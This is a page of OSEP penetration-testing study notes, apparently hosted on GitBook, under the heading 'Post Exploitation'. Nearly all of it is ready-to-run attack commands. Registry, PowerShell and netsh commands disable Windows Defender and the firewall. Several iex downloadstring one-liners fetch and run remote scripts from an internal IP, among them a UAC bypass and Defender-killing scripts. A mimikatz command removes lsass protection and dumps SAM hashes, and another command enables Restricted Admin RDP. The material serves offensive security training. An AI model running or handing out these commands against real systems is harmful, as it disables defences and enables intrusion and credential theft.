OSEP Notes
  • Introduction
  • Useful Links, Tools & Tricks
  • OSEP
    • Metasploit Payload & Listener
      • Metasploit Useful Modules
      • Encoder
    • File Transfer & Execution
    • Phishing
    • Local Reconnaissance Windows
      • SQL Server Instance
      • Application Whitelisting & Credentials
    • Local Reconnaissance Linux
      • Ansible
    • Privilege Escalation
    • Pivoting
    • Pass the Hash
      • Remote Access
    • Post Exploitation
      • Add User
      • AMSI, CLM, & App Locker
    • Credentials
    • Lateral Movement
  • Active Directory
    • Domain Reconnaissance on Kali
    • Domain Reconnaissance on Windows
    • Active Directory Forest
Powered by GitBook
On this page
  • Disable AV
  • Restricted Admin RDP
  • Dump lsass
  • Kill Defender via TrustedInstaller
  1. OSEP

Post Exploitation

PreviousRemote AccessNextAdd User

Last updated 1 year ago

Disable AV

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f 
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring " /t REG_DWORD /d 1 /f

Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true 

NetSh Advfirewall set allprofiles state off

iex(new-object net.webclient).downloadstring('http://172.21.23.10/defendersdeath.ps1')
iex(new-object net.webclient).downloadstring('http://172.21.23.10/fuckdefender.ps1')

Restricted Admin RDP

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0

Dump lsass

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "token::elevate" "lsadump::sam" exit

Kill Defender via TrustedInstaller

iex(new-object net.webclient).downloadstring('http://172.21.23.10/uacbypass.ps1');alt
.\wsudo -T powershell
.\fuckdefender.ps1
reboot

FuckDefender.ps1
DefendersDeath.ps1